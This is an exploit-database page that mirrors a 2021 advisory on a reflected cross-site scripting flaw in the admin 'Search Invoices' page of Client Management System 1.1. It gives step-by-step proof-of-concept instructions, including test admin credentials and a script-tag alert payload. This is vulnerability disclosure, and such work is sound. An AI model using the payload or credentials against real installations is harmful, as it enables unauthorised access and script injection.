Advertisement






Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' o

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
N/A Medium Remote 2021-06-15
CPE
cpe:Not provided for this exploit
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 0.02192 0.36857

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060093

Below is a copy:

Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel
# Exploit Title: Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel
# Date: 14 June 2021
# Exploit Author: BHAVESH KAUL
# Author Linkedin: https://www.linkedin.com/in/bhavesh-kaul-cs/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP

# Description #

Client Management System 1.1 is vulnerable to reflected cross site scripting because of insufficient user supplied data sanitization. 

# Proof of Concept (PoC) : Exploit #

1) Goto: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Goto: http://localhost/clientms/admin/search-invoices.php
4) Enter the following payload in the user name field: <script>alert(1)</script>
5) Click on Search
6) Our payload is fired and popped alert

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.